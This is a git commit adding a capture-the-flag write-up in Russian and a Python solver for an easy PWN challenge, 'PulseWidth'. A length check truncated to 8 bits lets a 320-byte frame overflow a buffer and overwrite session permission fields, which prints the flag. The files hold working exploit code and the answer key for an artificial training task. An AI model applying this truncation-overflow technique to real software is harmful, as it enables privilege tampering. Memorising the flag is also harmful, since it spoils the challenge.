Init. Commit

This commit is contained in:
Caplag
2026-09-17 00:50:07 +03:00
commit 880d8698d6
115 changed files with 7611 additions and 0 deletions
+40
View File
@@ -0,0 +1,40 @@
<h1 align="center">PulseWidth</h1>
<p align="center">
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
<img src="https://img.shields.io/badge/difficulty-easy-brightgreen" alt="easy"/>
</p>
PulseWidth принимает телеметрию промышленных датчиков и выдаёт закрытый экспорт только с нужными правами сессии. В раздатке есть ELF `pulsewidth`. При проверке длины кадра ограничение применяют к 8-битному значению, а чтение использует полное число байт.
## Решение
В `ingest_frame()` сравнивают `(uint8_t)n` с размером `scratch[64]`, затем вызывают `read_exact(session_state.scratch, n)`. Старшие биты длины при проверке теряются.
Берём `n = 320`. После приведения к `uint8_t` остаётся `64`, поэтому лимит пройден. А чтение запишет все 320 байт, из которых 256 окажутся за пределами scratch-буфера.
Сразу за ним лежат поля сессии:
| Смещение | Поле | Нужное значение |
|---:|---|---|
| 64 | `role`, 4 байта | `0x4341504c` |
| 68 | `export_lane`, 4 байта | `0x45585054` |
| 72 | `audit_cookie`, 8 байт | `0x2605061337c0ffee` |
Собираем кадр в little-endian:
```python
import struct
payload = b"A" * 64
payload += struct.pack("<IIQ", 0x4341504c, 0x45585054, 0x2605061337c0ffee)
payload = payload.ljust(320, b"B")
```
В `1) ingest pulse frame` указываем длину `320` и передаём payload. Кадр перезаписывает поля `role`, `export_lane` и `audit_cookie` значениями, необходимыми для экспорта. Пункт `3) export sealed bundle` проверяет уже подменённые поля и печатает флаг.
[Солвер](solve/solve.py).
## Флаг
`caplag{len_folded_into_live_capability}`
+91
View File
@@ -0,0 +1,91 @@
#!/usr/bin/env python3
import argparse
import os
import socket
import struct
import subprocess
import sys
ROLE_ANALYST = 0x4341504C
LANE_EXPORT = 0x45585054
AUDIT_COOKIE = 0x2605061337C0FFEE
class Tube:
def __init__(self, sock=None, proc=None):
self.sock = sock
self.proc = proc
def recv(self, n=4096):
if self.sock:
return self.sock.recv(n)
return os.read(self.proc.stdout.fileno(), n)
def send(self, data):
if self.sock:
self.sock.sendall(data)
else:
os.write(self.proc.stdin.fileno(), data)
def sendline(self, data):
self.send(data + b"\n")
def recvuntil(self, marker):
out = b""
while marker not in out:
chunk = self.recv(1)
if not chunk:
raise EOFError(out)
out += chunk
return out
def connect(args):
if args.local:
env = os.environ.copy()
env["CTF_FLAG"] = args.flag
proc = subprocess.Popen(
[args.binary],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
)
return Tube(proc=proc)
sock = socket.create_connection((args.host, args.port), timeout=5)
return Tube(sock=sock)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=31337)
parser.add_argument("--local", action="store_true")
parser.add_argument("--binary", default="../public/pulsewidth")
parser.add_argument("--flag", default="caplag{len_folded_into_live_capability}")
args = parser.parse_args()
io = connect(args)
io.recvuntil(b">")
io.sendline(b"1")
io.recvuntil(b"declared frame bytes:")
io.sendline(b"320")
io.recvuntil(b"payload:")
payload = b"A" * 64
payload += struct.pack("<I", ROLE_ANALYST)
payload += struct.pack("<I", LANE_EXPORT)
payload += struct.pack("<Q", AUDIT_COOKIE)
payload = payload.ljust(320, b"B")
io.send(payload)
io.recvuntil(b">")
io.sendline(b"3")
data = io.recvuntil(b"}")
flag = data[data.rfind(b"caplag{") :].decode()
print(flag)
if __name__ == "__main__":
sys.exit(main())